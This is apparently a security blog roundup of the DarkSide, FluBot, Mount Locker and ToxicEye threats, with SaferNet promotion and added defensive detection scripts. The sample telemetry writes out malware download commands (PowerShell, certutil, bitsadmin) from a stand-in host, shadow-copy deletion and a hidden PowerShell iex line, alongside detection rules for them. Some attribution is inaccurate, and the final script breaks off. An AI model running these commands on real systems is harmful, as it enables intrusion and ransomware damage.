Darkside Ransomware Takes Colonial Pipeline Offline

It would be hard to blame someone for believing the Microsoft Exchange exploits would be the worst cyberattack of 2021, but the Darkside ransomware attack on the Colonial Pipeline is shaping up to be a far greater threat. Colonial Pipeline, which supplies 45% of the East Coast’s fuel, revealed a ransomware outbreak on the company’s systems last Friday, which forced it to suspend pipeline operations and some IT systems. The attack took place on May 7th, and at the time of writing, the pipeline’s systems are still offline.

Ransomware attacks usually target private enterprises, since ransomware is a for-profit vehicle. The Darkside attack, however, has hit major critical infrastructure, which makes it far more serious in nature.

Colonial Pipeline says that a system restart plan is being “developed” and some small lateral lines are back in service. However, it may be days before full functions are restored, and in the meantime, gasoline futures are rising and there is concern that some parts of the US may experience fuel shortages. Gasoline futures jumped to their highest level in three years due to the cyberattack.

The USDOT Federal Motor Carrier Safety Administration (FMCSA) has issued a Regional Emergency Declaration to ease the supply disruption, granting temporary exemptions for road transport of fuel, including the hours that drivers are permitted to work.

The FBI has confirmed that the attack is indeed the Darkside ransomware strain. “The FBI confirms that the Darkside ransomware is responsible for the compromise of the Colonial Pipeline networks,” the law enforcement agency says. “We continue to work with the company and our government partners on the investigation.”

However, it is unclear exactly who is behind the attack. Darkside ransomware was created by the Darkside gang, who both sell it as Ransomware-as-a-Service (RaaS) and use it themselves. One could guess that the gang itself carried out the attack, but this is unlikely given their MO and the fact that they have denied it.

Darkside first appeared in the summer of 2020, targeting private enterprise. Unusually for a hacking organization, they made public pledges not to attack critical infrastructure, healthcare, or government agencies. That is all well and good, but since the gang sells their malware, they cannot guarantee it won’t be used for aims that don’t align with their own.

Days after the attack, the DarkSide ransomware gang issued a press statement saying that their organization is ‘apolitical’ and not associated with any government.

Darkside Ransomware Gang Press Release

Promising extra checks on their customers sounds reassuring, but in the shadowy world of hackers it means little. It isn’t the first time Darkside has sought good press: last year they donated tens of thousands of dollars, earned from Darkside ransomware attacks, to charities.

Under their arrangement with customers, the gang takes 20-30% of the ransoms paid by targets.

While the true identity of those who deployed the Darkside ransomware is unclear, they are highly likely to be based in Russia or a former Soviet state. If the attack was political in nature, it may well be the work of Cozy Bear or Fancy Bear, two state-sponsored groups operating within Russia’s GRU intelligence service. This of course raises the question of why they did not use their own ransomware. That too is unclear, but it could be a way of obscuring attribution.

Besides Russia, the culprits could be the Lazarus Group, Pyongyang’s hacking organisation.

Spokespeople from Colonial Pipeline have not yet confirmed how the Darkside ransomware got into their systems. Jon Niccolls of Check Point believes the attackers most likely gained access to Colonial’s network through the administrative side of the business.

“Some of the biggest attacks we’ve seen all started with an email,” Niccolls said. “An employee may have been tricked into downloading some malware, for example. We’ve also seen recent examples of hackers getting in using weaknesses in or compromise of third-party software. Hackers will use any chance they get to gain a foothold in a network.”

Experts said that gasoline prices are unlikely to be affected if the pipeline is back to normal in the next few days but that the incident — the worst cyberattack to date on critical US infrastructure — should serve as a wake-up call to companies about the vulnerabilities they face.

Darkside Ransomware Analysis

This analysis of Darkside was carried out largely by researchers at Cybereason.

According to Hack Forums, the DarkSide team recently announced the release of DarkSide 2.0. According to the group, it has the fastest encryption speed on the market and now includes both Windows and Linux versions.

The team is very active on hacking forums and keeps its customers updated with news about Darkside ransomware. In an effort to grow and expand its operations, the group has started an affiliate program for prospective users.

Like many other ransomware variants, DarkSide follows the double-extortion trend: the threat actors not only encrypt the victim’s data but first exfiltrate it and threaten to publish it if the ransom is not paid. This makes backups alone an inadequate precaution against a ransomware attack, since they do nothing to protect the stolen data.

DarkSide has been observed in use against targets in English-speaking countries and appears to avoid countries associated with the former Soviet Bloc. Ransom demands range from US$200,000 to $2,000,000, and according to the group’s website it has published stolen data from more than 40 victims, which is estimated to be just a fraction of the total number of victims.

Unlike the operators of many other ransomware variants, such as Maze, which was used to successfully attack suburban Washington schools, the group behind DarkSide appears to have a code of conduct that prohibits attacks against hospitals, hospices, schools, universities, non-profit organizations, and government agencies.

Rules for those purchasing Darkside Ransomware

After gaining an initial foothold in the network, the attackers start to collect information about the environment and the company. If the potential target turns out to be on the attackers’ list of prohibited organizations (i.e. hospitals, hospices, schools, universities, non-profit organizations, or government agencies), they do not proceed with the attack.

Otherwise, the attackers continue the operation: they collect files, credentials and other sensitive information and exfiltrate it. They then use PowerShell to download the DarkSide binary as “update.exe” via the “DownloadFile” call, abusing Certutil.exe and Bitsadmin.exe in the process.

In addition to downloading the DarkSide binary into the C:\Windows and temporary directories, the attacker also creates a shared folder on the infected machine and uses PowerShell to download a copy of the malware there.

After securing a foothold on one machine, the attacker moves laterally through the environment with the main goal of taking over the Domain Controller (DC).

Once the attackers reach the DC, they collect further sensitive information and files, including dumping the SAM hive, which stores local account password hashes.

In addition to collecting data from the DC, the attackers use PowerShell to download the DarkSide binary from the shared folder created on the previously infected host.

When the DarkSide ransomware first executes on an infected host, it checks the system language using the GetSystemDefaultUILanguage() and GetUserDefaultLangID() functions, so that systems located in former Soviet Bloc countries are not encrypted.

Darkside Ransomware checking if the installed language is Russian

DarkSide then stops all services related to security and backup solutions and establishes a connection to its C2 (command and control) server. After uninstalling the Volume Shadow Copy Service (VSS), it deletes the existing shadow copies by launching an obfuscated PowerShell script that removes them through WMI.

The malware then enumerates the running processes and terminates selected ones to release the locks on their files, so that it can both steal the information those files contain and encrypt them.

DarkSide creates a unique User_ID string for the victim and appends it to the extension of each encrypted file, so that a file is renamed to <File_name>.{userid}. It also changes the icons of the encrypted files and sets the desktop background to solid black with the text “All your files have been encrypted!”
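The sequence just described (PowerShell DownloadFile of “update.exe”, certutil/bitsadmin abuse, staging on a share that the DC later pulls from, and WMI shadow-copy deletion) gives a defender concrete command-line patterns to alert on. The following script is an added example, not Cybereason’s code: it runs a handful of such rules over constructed Sysmon-style process-creation records, and the host names, IP address and rule names are assumptions.

```python
"""Detection rules for the DarkSide pre-encryption tradecraft described
above: PowerShell DownloadFile of update.exe, certutil/bitsadmin abuse,
staging on a share reached over UNC, and WMI shadow-copy deletion.
Added example, not Cybereason's code; the events are constructed to look
like Sysmon process-creation records exported as key=value text, and the
host names, IP address and rule names are assumptions."""
import re
from collections import defaultdict
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample telemetry (not real logs). 198.51.100.0/24 is a
# documentation range, used here as a stand-in for the attacker's host.
SAMPLE_EVENTS = [
    'host=WS01 user=jdoe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmdline="powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile(\'http://198.51.100.7/update.exe\',\'C:\\Windows\\update.exe\')"',
    'host=WS01 user=jdoe image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil -urlcache -split -f http://198.51.100.7/update.exe C:\\Windows\\Temp\\update.exe"',
    'host=WS01 user=jdoe image=C:\\Windows\\System32\\bitsadmin.exe '
    'cmdline="bitsadmin /transfer job /download /priority high http://198.51.100.7/update.exe C:\\Windows\\Temp\\update.exe"',
    'host=DC01 user=svc_backup image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmdline="powershell -c (New-Object Net.WebClient).DownloadFile(\'\\\\WS01\\share\\update.exe\',\'C:\\Windows\\update.exe\')"',
    'host=DC01 user=svc_backup image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmdline="powershell -w hidden -c Get-WmiObject Win32_ShadowCopy | ForEach-Object {$_.Delete()}"',
    'host=WS02 user=asmith image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmdline="powershell -c Get-ChildItem C:\\Reports | Measure-Object"',
]

EVENT_RE = re.compile(r'^host=(\S+) user=(\S+) image=(\S+) cmdline="(.*)"$')


def parse_event(line: str) -> Optional[Dict[str, str]]:
    """Split one key=value record into its fields; None if it does not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    host, user, image, cmdline = m.groups()
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}


def _is_powershell(image: str) -> bool:
    return image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))


def _is_lolbin_downloader(image: str) -> bool:
    return image.lower().endswith(("\\certutil.exe", "\\bitsadmin.exe"))


# Each rule: (name, predicate over the image path and raw command line).
RULES: List[Tuple[str, Callable[[str, str], bool]]] = [
    ("powershell_downloadfile_update_exe",
     lambda img, cmd: _is_powershell(img)
     and "downloadfile" in cmd.lower() and "update.exe" in cmd.lower()),
    ("certutil_or_bitsadmin_http_download",
     lambda img, cmd: _is_lolbin_downloader(img) and "http" in cmd.lower()),
    ("powershell_fetch_from_unc_share",
     # A UNC source (\\host\share) fetched by PowerShell matches the
     # lateral-movement step where the DC pulls the binary from WS01.
     lambda img, cmd: _is_powershell(img)
     and "downloadfile" in cmd.lower() and "\\\\" in cmd),
    ("wmi_shadow_copy_deletion",
     lambda img, cmd: "win32_shadowcopy" in cmd.lower() and "delete" in cmd.lower()),
]


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (host, rule_name, cmdline) for every rule that fires on an event."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for name, pred in RULES:
            if pred(ev["image"], ev["cmdline"]):
                hits.append((ev["host"], name, ev["cmdline"]))
    return hits


def summarize(hits: List[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Group fired rule names per host, preserving first-seen order."""
    per_host: Dict[str, List[str]] = defaultdict(list)
    for host, name, _ in hits:
        if name not in per_host[host]:
            per_host[host].append(name)
    return dict(per_host)


if __name__ == "__main__":
    for host, rules in summarize(scan(SAMPLE_EVENTS)).items():
        print(f"{host}: {', '.join(rules)}")
```

A host that trips several of these rules in sequence (download, then staging, then shadow-copy deletion) is the pre-encryption window in which isolating it still prevents the ransomware stage.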

Finally, it drops the ransom note:

Protection

While Darkside as an organisation may have intentions that some would consider ‘harmless’, it is very clear that their ransomware product is unchecked and can be used against anybody. It is critical that business owners have the right tools to keep their companies safe in the face of ever-evolving cyberthreats like Darkside ransomware.

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories.

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employee’s or family members devices; including activity, time spent online, and threats blocked.

Flubot Spyware spreading to Android Devices Through Delivery Scam

Android users across the UK and EU are being warned of a new spyware scam spreading to devices. The attack vector is SMS, and the payload is a spyware strain named Flubot. Targets receive a text message prompting them to install a “missed package delivery” app; if they follow the link, they are taken to a delivery website and asked to download the delivery company’s app, which is of course the Flubot spyware. Upon installation, Flubot is immediately dangerous: it sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device, and extracting various pieces of personal information.

Flubot connects to a hacker’s command-and-control (C&C) server, to which it relays all of this data. The spyware also sends text messages containing the same initial link to everyone in the user’s contact list, aiming to propagate virally.

The U.K.’s National Cyber Security Centre (NCSC) has issued security guidance about how to identify and remove FluBot malware, while network providers, including Three and Vodafone, have also issued warnings to users over the text message attacks.

So far, most of the phishing texts are branded to look like they are being sent from DHL, the NCSC said, but warned, “the scam could change to abuse other company brands.”

The NCSC claims Flubot is damaging enough that the only solution for removal is a factory reset.

The text a target receives. Though this example shows DHL, other courier companies have been reported.

The attack has been reported in several variations. The most obvious is a change in the supposed courier company sending the text. In another case, the text purports to be from Amazon and includes an almost legitimate-looking link; however, the link replaces an ‘o’ with a zero.

Telecom carriers Vodafone UK, Three UK and EE have all confirmed the scam is traversing their networks, which collectively have more than 58 million subscribers across the country.

Anyone who receives what they believe to be a scam text is advised not to click on any links and to forward the text to “7726”, a free spam-reporting line established to combat fraud in the U.K. Finally, delete the message and block the sender.

The fraudulent site where the target is asked to download spyware

If a user has already clicked on the link, the NCSC warned not to enter any password or other personal information. To remove the malware from the infected device, “Perform a factory reset as soon as possible,” the NCSC guidance reads. “The process for doing this will vary based on the device manufacturer…Note that if you don’t have backups enabled, you will lose data.”

The NCSC added that if a user has entered their personal information, it’s critical to change those passwords immediately to prevent further compromise.

The Flubot spyware was initially spotted in the UK, followed by Hungary and other EU states. It is believed that the campaign will eventually reach the US.

Flubot Spyware Analysis

The analysis of Flubot spyware was carried out by Prodaft.

FluBot uses a common Android malware packer that loads the decrypted DEX at runtime. Without any hooks, analysts can access the dropped DEX in the ‘app_DynamicOptDex’ folder. Only string obfuscation is present in the decrypted DEX.

Flubot spyware has a number of commands, most of which are self-explanatory.

Beyond its targeted apps, FluBot can trigger on-demand credit card phishing when it receives the “CARD_BLOCK” command from the server. It blocks all incoming notifications when the BLOCK command is received, and it can make USSD calls to codes sent from the C&C server.

FluBot is also able to set itself as the default SMS application by abusing accessibility permissions, thus allowing the malware to send SMS messages on demand.

Once it has infected the victim’s device, FluBot sends all phonebook (contact list) numbers to the C&C server. FluBot uses a domain generation algorithm (DGA) to obtain the address of the C&C server: the DGA creates 2000 domains based on the current year and month, each consisting of 15 characters under the “com”, “ru” or “cn” TLDs.
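The DGA parameters above (15-character labels, com/ru/cn TLDs, 2000 candidates per month) mean an infected handset produces bursts of NXDOMAIN answers for random-looking names before it finds a live C&C domain. The following DNS-log heuristic is an added example, not Prodaft’s code; the log lines are constructed, and the entropy and per-client count thresholds are assumptions to tune on real traffic.

```python
"""Heuristic DGA detection tuned to the FluBot behaviour described above:
15-character second-level labels under com/ru/cn, 2000 of them per month,
which an infected phone resolves in bursts until one answers.  Added
example, not Prodaft's code; the DNS log lines are constructed and the
entropy and count thresholds are assumptions to tune on real data."""
import math
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple, Optional

FLUBOT_TLDS = {"com", "ru", "cn"}
FLUBOT_LABEL_LEN = 15
ENTROPY_THRESHOLD = 3.5      # bits/char; 15 mostly distinct letters score ~3.9
MIN_NXDOMAIN_PER_CLIENT = 3  # assumption; raise on real traffic volumes

# Constructed log: "<epoch> <client-ip> <qname> <rcode>".  10.0.0.44 plays
# an infected handset walking the DGA list; 10.0.0.21 is ordinary traffic.
SAMPLE_DNS_LOG = """\
1620400001 10.0.0.21 www.google.com NOERROR
1620400002 10.0.0.21 internationally.com NOERROR
1620400003 10.0.0.44 qwpzlkjhgfdsamn.com NXDOMAIN
1620400003 10.0.0.44 bvcxzasdfghjklm.ru NXDOMAIN
1620400004 10.0.0.44 mnbvcxzlkjhgfds.cn NXDOMAIN
1620400004 10.0.0.44 ytrewqasdfghjkl.com NXDOMAIN
1620400005 10.0.0.44 poiuytrewqasdfg.ru NOERROR
1620400006 10.0.0.21 microsoftonline.com NOERROR
1620400007 10.0.0.21 zxcvbnmasdfghjk.com NXDOMAIN
"""


class DnsRecord(NamedTuple):
    ts: int
    client: str
    qname: str
    rcode: str


def shannon_entropy(s: str) -> float:
    """Per-character Shannon entropy in bits (0.0 for an empty string)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def is_dga_candidate(qname: str) -> bool:
    """Shape test: 15-letter registrable label, FluBot TLD, random-looking."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 2 or labels[-1] not in FLUBOT_TLDS:
        return False
    sld = labels[-2]
    return (len(sld) == FLUBOT_LABEL_LEN and sld.isalpha()
            and shannon_entropy(sld) >= ENTROPY_THRESHOLD)


def parse_line(line: str) -> Optional[DnsRecord]:
    parts = line.split()
    if len(parts) != 4:
        return None
    return DnsRecord(int(parts[0]), parts[1], parts[2], parts[3])


def detect(log_text: str) -> Dict[str, Dict[str, List[str]]]:
    """Clients whose distinct NXDOMAIN DGA-shaped lookups reach the threshold.

    Returns {client: {"nxdomain": [...], "resolved": [...]}}; a resolved
    candidate from a flagged client is the live C&C name worth blocking.
    """
    nx: Dict[str, List[str]] = defaultdict(list)
    ok: Dict[str, List[str]] = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_dga_candidate(rec.qname):
            continue
        bucket = nx if rec.rcode == "NXDOMAIN" else ok
        if rec.qname not in bucket[rec.client]:
            bucket[rec.client].append(rec.qname)
    return {c: {"nxdomain": names, "resolved": ok.get(c, [])}
            for c, names in nx.items() if len(names) >= MIN_NXDOMAIN_PER_CLIENT}


if __name__ == "__main__":
    for client, info in detect(SAMPLE_DNS_LOG).items():
        print(client, "tried", len(info["nxdomain"]), "DGA names; resolved:", info["resolved"])
```

The entropy filter keeps 15-letter dictionary names such as internationally.com out of the candidate set; the per-client NXDOMAIN count is what separates a bot walking the monthly list from a single odd lookup.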

The C&C panel contains the tabs “Bots,” “Stats,” “Commands,” “Inject List,” “All Logs,” and “Inject Logs.” From the Commands tab, the threat actor can manage every infected device using the commands listed there.

The C&C panel also contains detailed statistics of the infected victims. At the time of analysis, FluBot had already infected more than 60,000 devices.

The statistics page of the panel also contains details about the device manufacturers, Android versions, device languages, and telecommunication operator names. When FluBot successfully obtains banking credentials, they are sent to the C&C and stored in a log format.

Each log entry for the infected device may contain the SMS messages, banking credentials, device contacts, and application webview text logs, all of which can be used for extracting any kind of text-based credentials from every application that uses webview panes.

Protection

Given that the Flubot spyware can only be removed from a phone by a factory reset, it is extremely important that users have protection against threats like it. There are a number of tools that can protect devices, and one of these tools is SaferNet.


Mount Locker Ransomware Update Sees Aggressive Change of Tactics

The Mount Locker ransomware has been exploring new attack vectors and methods in its latest campaigns, according to researchers at GuidePoint. Mount Locker is a relatively new ransomware strain that made a splash in the Ransomware-as-a-Service (RaaS) scene in 2020. The group behind it has been actively developing it and released a major update in November that broadened its targeting, for example by searching for TurboTax file extensions to encrypt, and added further evasion improvements. Since November, Mount Locker ransomware attacks have escalated, and in 2021 another major improvement has been added, which signals “an aggressive shift in Mount Locker’s tactics,” according to an analysis by the researchers.

Like many ransomware gangs, the operators both lock up files and steal data, threatening to leak it if the ransom isn’t paid in a double-extortion gambit. They are also known for demanding multimillion-dollar ransoms and stealing vast amounts of data (up to 400 GB).

GuidePoint noted that many of the tools used in Mount Locker ransomware attacks are legitimate but are clearly being put to nefarious ends. These include AdFind and BloodHound for Active Directory and user reconnaissance; FTP for file exfiltration; and the penetration-testing tool Cobalt Strike for lateral movement and for the delivery and execution of the encryptor, potentially through PsExec.

“After the environment is mapped, backup systems are identified and neutralized, and data is harvested, systems are encrypted with target-specific ransomware delivered via the established command-and-control channels (C2),” said Drew Schmitt, a senior threat intelligence analyst for GuidePoint, in the analysis. “These payloads include executables, extensions, and unique victim IDs for payment.”

More recent attacks have taken fresh approaches, mostly through batch scripts, which can be designed to disable detection and prevention tools.

“[This] indicates that Mount Locker Ransomware is increasing its capabilities and is becoming a more dangerous threat,” according to Schmitt. “These scripts were not just blanket steps to disable a large swath of tools, they were customized and targeted to the victim’s environment.”

Another change in tactics for the group involves using multiple Cobalt Strike servers with unique domains. It’s an added step that helps with detection evasion, but Schmitt noted that it isn’t often seen because it requires much more management to put into practice effectively.

The majority of Mount Locker ransomware attacks have been against the biotech industry. Researchers believe this may indicate a larger campaign afoot that aggressively targets healthcare-adjacent industries.

“Biotech companies, in particular, are a prime target for ransomware because of their position in an industry flush not only with cash but also with highly sensitive IP,” Schmitt explained. “Additionally, connections to other research organizations increase the potential to damage the victim’s reputation in the industry and put business dealings at risk.”

Healthcare providers and healthcare supply manufacturers have long suffered as victims of ransomware. Due to the time-sensitive nature of their work, they stand to lose more than other potential targets, and researchers noted that “attackers view them as more likely to pay the requested ransom quickly.”

As well as the new attack vectors, Mount Locker ransomware appears to be undergoing a name change, to Astro Locker. This is likely more than an aesthetic choice and could mean the group is rebranding entirely in order to step up its game. Schmitt pointed out that “the verbiage and victims listed on both variants’ shaming sites share significant overlap.” He added, “this could signal a shift in the group’s overall tactics and an effort to fully rebrand as a more insidious threat.”

Organizations can look for signs of Mount Locker ransomware or AstroLocker within their environments, such as Cobalt Strike stagers and beacons, and they should monitor for the staging and exfiltration of files via FTP.

“While these would always be cause for alarm…an updated, more aggressive Mount Locker Ransomware and the dramatic increase in attacks attributable to the group make these indicators of compromise particularly alarming,” Schmitt concluded.

Mount Locker Ransomware Analysis

This analysis was carried out by independent ransomware researcher Zawadi Done.

For encryption, Mount Locker ransomware uses ChaCha20 to encrypt files and RSA-2048 to encrypt the encryption key. But before the encryption procedure runs, Mount Locker ransomware performs a few tasks that increase the effectiveness of the ransomware.

Both files are packed with a packer written in Visual Basic. The packer checks if the process is being debugged using IsDebuggerPresent; if not, it continues to unpack the executable into a newly created segment. Using x64dbg and PE-bear I dumped the full executable from memory and modified the image base and section headers.

The serial number of the drive in use is retrieved and used as the mutex value. Every time an encrypted file is opened, the recovery manual of the ransomware is also opened.

To run a PowerShell script it will create a file in the temporary folder C:\Users\IEUser\AppData\Local\Temp\.tmp and write the PowerShell script shown below to that file.

The PowerShell script is then executed by calling:

powershell.exe -windowstyle hidden -c $mypid='972';[System.IO.File]::ReadAllText('C:\Users\IEUser\AppData\Local\Temp\~1399171.tmp')|iex

This results in the shadow copies being deleted and a list of services and processes being stopped.

Using the API calls CryptAcquireContextW, CryptImportKey and CryptEncrypt, an embedded RSA-2048 key is imported and used to encrypt 32 bytes generated with the rdtsc instruction. The plaintext and ciphertext of these bytes will later be used to encrypt other values. The ransomware will search for all types of drives, and it skips the following file extensions and directories.

Using CreateFileW and CreateFileMappingW it creates a file handle and a handle to the file in memory. Instead of using MoveFileW to change the file name, it uses SetFileInformationByHandle to change the file’s extension.

Using ChaCha20, file_32_bytes will be encrypted with 32_bytes as the key and the first 12 bytes of 32_bytes as the nonce. Let’s call the ciphertext encrypted_32_bytes. It then writes file_encrypted_32_bytes and encrypted_32_bytes to the end of the file that will be encrypted.

Using MapViewOfFile the file is mapped into memory with a length of the file’s size or 0x4000000 bytes. This buffer is then encrypted with ChaCha20 using file_32_bytes as the key and the first 12 bytes of file_32_bytes as the nonce. After the buffer is encrypted, it calls MapViewOfFile to store the buffer to the file on disk.

The encryption procedure is described in the diagram below.

After the files are encrypted, Mount Locker ransomware will delete itself.

The Mount Locker ransomware drops a ransom note in every folder that it encrypts with the name RecoveryManual.html. This note includes a ClientId which can be used to contact the threat actor on their own “support” portal. This ClientId is based on the computer name XOR’ed by a hardcoded value.

Protection

With threats like Mount Locker Ransomware evolving and expanding everyday, it is important individuals and business owners have adequate protection tools to keep their devices safe. One of these tools is SaferNet.


ToxicEye RAT Abuses Telegram For Command & Control

Hackers are leveraging the popular messaging app Telegram to control a Remote Access Trojan (RAT). Dubbed ToxicEye RAT, it gives an attacker control of a victim’s device via a Telegram bot, even if the Telegram app is not installed on the victim’s device. ToxicEye can take over the file system, load other malware such as ransomware, and steal data from the device, according to a new report by Check Point. Researchers have tracked more than 130 attacks in the last 90 days that used ToxicEye RAT. The attackers use the messaging service to communicate with their own server and return data to it.

Telegram, the cloud-based IM platform, has enjoyed a surge in popularity this year because of controversial changes to the privacy settings of its rival, WhatsApp. Telegram was the most downloaded app worldwide for January 2021 with more than 63 million installs and has surpassed 500 million monthly active users. This popularity also extends to the cyber-criminal community. Malware authors are increasingly using Telegram as a ready-made command and control (C&C) system for their malicious products because it offers several advantages compared to conventional web-based malware administration.

“We believe attackers are leveraging the fact that Telegram is used and allowed in almost all organizations, utilizing this system to perform cyber attacks, which can bypass security restrictions,” researchers said.

According to researchers, there are a couple of reasons why Telegram is being used for malware like ToxicEye RAT:

  • Telegram is a legitimate, easy-to-use and stable service that isn’t blocked by enterprise anti-virus engines, nor by network management tools
  • Attackers can remain anonymous as the registration process requires only a mobile number
  • The unique communications features of Telegram mean attackers can easily exfiltrate data from victims’ PCs, or transfer new malicious files to infected machines
  • Telegram also enables attackers to use their mobile devices to access infected computers from almost any location globally.

The first use of Telegram as an attack vector was by the Masad info-stealer in 2017. The criminals behind Masad realized that using a popular IM service as an integral part of their attacks gave them a number of operational benefits. Since Masad became available on hacking forums, dozens of new types of malware that use Telegram for C&C and exploit Telegram’s features for malicious activity have been found as ‘off-the-shelf’ weapons in hacking tool repositories on GitHub.

ToxicEye RAT Infection Chain and Functionality

The analysis of the infection chain and functionality was carried out by Check Point.

In the first step of a ToxicEye RAT operation, the attacker creates a Telegram account and a Telegram ‘bot’. A Telegram bot is a special remote account with which users can interact in Telegram chat, by adding it to Telegram groups, or by sending requests directly from the input field by typing the bot’s Telegram username and a query.

The bot is embedded into the ToxicEye RAT configuration file, which is compiled into an executable. Any victim infected with this malicious payload can be attacked via the Telegram bot, which connects the victim’s device back to the attacker’s C&C via Telegram.

In the observed phishing emails, ToxicEye RAT is downloaded and run when the victim opens a malicious document called solution.doc and clicks “Enable Content.”

ToxicEye RAT Infection Chain

Code snippet example from open-source Telegram RAT repositories

Telegram-based RATs share many modules, but some of the more dangerous ones, such as ToxicEye RAT, have several key capabilities that distinguish them from the rest:

  • Data stealing features – the RAT can locate and steal passwords, computer information, browser history and cookies.
  • File system control – Deleting and transferring files, or killing PC processes and taking over the PC’s task manager.
  • I/O hijacking – the RAT can deploy a keylogger, or record audio and video of the victim’s surroundings via the PC’s microphone and camera, or hijack the contents of the clipboard.
  • Ransomware features – the ability to encrypt and decrypt victim’s files.

A functionality snippet example from a chosen Telegram RAT project

After the executable is installed, the attacker can hijack the computer through the bot.

The developers who publish these tools disguise their true purpose by describing them as a “Remote Administration Tool” or “for educational purposes only”, although some of their characteristics are commonly found in malicious Trojans.

Given that Telegram can be used to distribute malicious files or as a C&C channel for remotely controlled malware, researchers expect that ToxicEye RAT will be one of many.

Protection & Mitigation

There are several steps for protection and mitigation if you feel you may be infected with ToxicEye RAT:

  1. Search for a file called C:\Users\ToxicEye\rat.exe – if this file exists on your PC, you have been infected and must immediately contact your helpdesk and erase this file from your system.
  2. Monitor the traffic generated from PCs in your organization to a Telegram C&C – if such traffic is detected, and Telegram is not installed as an enterprise solution, this is a possible indicator of compromise.
  3. Beware of attachments containing usernames – malicious emails often use your username in their subject line or in the file name of the attachment. Treat such emails as suspicious: delete them, and never open the attachment or reply to the sender.
  4. Undisclosed or unlisted recipients – if the email recipients have no names, or the names are unlisted or undisclosed, this is a good indication that the email is malicious and/or a phishing email.
  5. Always note the language in the email – social engineering techniques are designed to take advantage of human nature, including the fact that people are more likely to make mistakes when they’re in a hurry and are inclined to follow the orders of people in positions of authority. Phishing attacks commonly use these techniques to convince their targets to ignore their suspicions about an email and click on a link or open an attachment.
  6. Deploy an automated anti-phishing solution – Minimizing the risk of phishing attacks to the organization requires tools that can spot decoy emails containing attacks like ToxicEye RAT better than the human eye. One of these tools is SaferNet.
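Step 2 above, turned into a check, as an added example that is not part of the original article or of the ToxicEye research: the script walks proxy log lines, flags every client that called the Telegram Bot API (api.telegram.org) unless the client is on an allowlist of machines where Telegram is sanctioned, and pulls the bot token and API method out of the URL when they are visible. The log line format, the allowlist, the client addresses and the bot tokens are all constructed for this example.

```python
"""Added example (not from the article or the ToxicEye research): flag hosts
that talk to the Telegram Bot API when Telegram is not an approved application.
The proxy log format, the allowlist and the sample lines are assumptions."""
import re
from collections import defaultdict

# Telegram's bot API lives under api.telegram.org/bot<token>/<method>.
BOT_API_HOST = "api.telegram.org"
# Tokens look like "<numeric bot id>:<secret>"; the secret is a long
# base64url-style string (a minimum of 30 characters is assumed here).
TOKEN_RE = re.compile(r"/bot(\d+:[A-Za-z0-9_-]{30,})/(\w+)")
# Assumed log line shape: "<ts> <client_ip> <method> <url> <status>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")

# Constructed proxy log. 10.0.5.21 is a sanctioned machine running an
# approved internal bot; 10.0.5.42 is a workstation polling a bot for commands.
SAMPLE_LOG = """\
2021-04-20T09:00:01Z 10.0.5.21 CONNECT web.telegram.org:443 200
2021-04-20T09:00:05Z 10.0.5.42 GET https://api.telegram.org/bot123456789:AAHkzXyz_abc-DEFGHIJKLMNOPQRSTUVWXY/getUpdates 200
2021-04-20T09:00:35Z 10.0.5.42 GET https://api.telegram.org/bot123456789:AAHkzXyz_abc-DEFGHIJKLMNOPQRSTUVWXY/getUpdates 200
2021-04-20T09:01:05Z 10.0.5.42 POST https://api.telegram.org/bot123456789:AAHkzXyz_abc-DEFGHIJKLMNOPQRSTUVWXY/sendDocument 200
2021-04-20T09:01:10Z 10.0.5.77 GET https://www.example.com/index.html 200
2021-04-20T09:02:00Z 10.0.5.21 GET https://api.telegram.org/bot987654321:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC/getMe 200
"""


def parse_line(line):
    """Return a dict for a well-formed log line, None otherwise."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    return {"ts": ts, "client": client, "method": method,
            "url": url, "status": int(status)}


def host_of(url):
    """Extract the host from a full URL or a CONNECT target (host:port)."""
    return re.sub(r"^https?://", "", url).split("/")[0].split(":")[0]


def find_bot_api_clients(log_text, allowlist=frozenset()):
    """Return {client_ip: {"hits": n, "tokens": set, "methods": set}} for every
    client that called the Bot API and is not on the allowlist."""
    findings = defaultdict(lambda: {"hits": 0, "tokens": set(), "methods": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["client"] in allowlist:
            continue
        if host_of(rec["url"]) != BOT_API_HOST:
            continue
        f = findings[rec["client"]]
        f["hits"] += 1
        m = TOKEN_RE.search(rec["url"])   # only present when TLS is inspected
        if m:
            f["tokens"].add(m.group(1))
            f["methods"].add(m.group(2))
    return dict(findings)


if __name__ == "__main__":
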